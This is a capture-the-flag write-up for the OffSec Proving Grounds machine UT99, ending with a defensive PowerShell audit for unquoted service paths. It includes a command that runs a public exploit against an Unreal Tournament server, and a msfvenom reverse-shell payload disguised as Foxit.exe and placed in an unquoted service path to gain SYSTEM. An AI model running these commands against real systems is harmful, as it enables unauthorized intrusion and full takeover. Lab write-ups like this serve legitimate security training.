UT99

Writeup for UT99 from OffSec Proving Grounds

Information Gathering

sudo ./nmapAutomator.sh 192.168.175.44 all

The scan also shows open IRC ports: the range 6660 to 7000, plus 7007.

Service Enumeration

FTP (Port 21)

We tried various standard login credentials, but none of them worked.

HTTP (Port 80)

Looks like this is running Dragonfly CMS. Manual enumeration led us to conclude this is a dead end.

IRC Ports (6660-7000 and 7007)

We can install HexChat IRC Client using the following command:

apt-get install hexchat -y

We can add a new network and name it however we want. Next, click Edit to change its parameters.

Here, add the IP and port number and click Close.

Then, we can use any name we want and click Connect.

Here, we click on the Server option and then on ChannelList.

Under ChannelList, we can search for channels with 1 to 9999 users, and we see the channel ut99.

Upon connecting, we see that the Unreal Tournament 99 Game server is hosted on port 7778.

Exploit

perl 16145.pl 192.168.175.44 7778 192.168.49.175 80

Privesc

Systeminfo

We manually enumerate and find the FTP directory.

Looks like this version of Foxit Reader is vulnerable to an unquoted service path privilege escalation. We can check if it is installed.

Looks like we have write permissions.

So let's generate our payload, named Foxit.exe.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.175 LPORT=80 -f exe -o Foxit.exe

Then, we transfer our file to the target machine.

Next, we reboot the machine so that the service starts again, and we get SYSTEM.

shutdown -r -t 5 && exit
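
The unquoted service path condition used above can be audited for on any Windows host. The following is an added example, not part of the original writeup: for each service it reports the extra executable names Windows tries before the real binary when the path is unquoted and contains spaces. The function name `Get-UnquotedPathCandidates` and the sample service entries are constructed for illustration.

```powershell
# Added example (not from the original writeup). Sample services are constructed.
# On a live host, replace $services with:
#   Get-CimInstance Win32_Service | Select-Object Name, PathName
function Get-UnquotedPathCandidates {
    param([string]$PathName)

    $p = $PathName.Trim()
    if ($p.StartsWith('"')) { return }                 # quoted: parsed unambiguously
    # Isolate the executable portion (everything up to the first ".exe").
    if ($p -notmatch '^(.*?\.exe)(\s|$)') { return }
    $exe = $Matches[1]
    if (-not $exe.Contains(' ')) { return }            # no spaces: nothing to misparse

    # For an unquoted path, each space-delimited prefix is tried with ".exe"
    # appended, in order, before the full path is reached.
    $idx = $exe.IndexOf(' ')
    while ($idx -ge 0) {
        $exe.Substring(0, $idx) + '.exe'
        $idx = $exe.IndexOf(' ', $idx + 1)
    }
}

# Constructed sample data: one vulnerable entry, two safe ones.
$services = @(
    [pscustomobject]@{ Name = 'ExampleUpdater'
        PathName = 'C:\Program Files\Example Vendor\Update Agent\agent.exe -svc' }
    [pscustomobject]@{ Name = 'QuotedSvc'
        PathName = '"C:\Program Files\Example Vendor\ok.exe" -k' }
    [pscustomobject]@{ Name = 'NoSpaceSvc'
        PathName = 'C:\Windows\System32\svchost.exe -k netsvcs' }
)

foreach ($s in $services) {
    $candidates = @(Get-UnquotedPathCandidates $s.PathName)
    if ($candidates.Count -gt 0) {
        [pscustomobject]@{
            Service    = $s.Name
            ImagePath  = $s.PathName
            TriedFirst = $candidates -join '; '
        }
    }
}
```

Only `ExampleUpdater` is reported. The fix for a flagged service is to wrap the executable path in double quotes in its ImagePath and to remove write access for non-administrators on every directory in that path.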
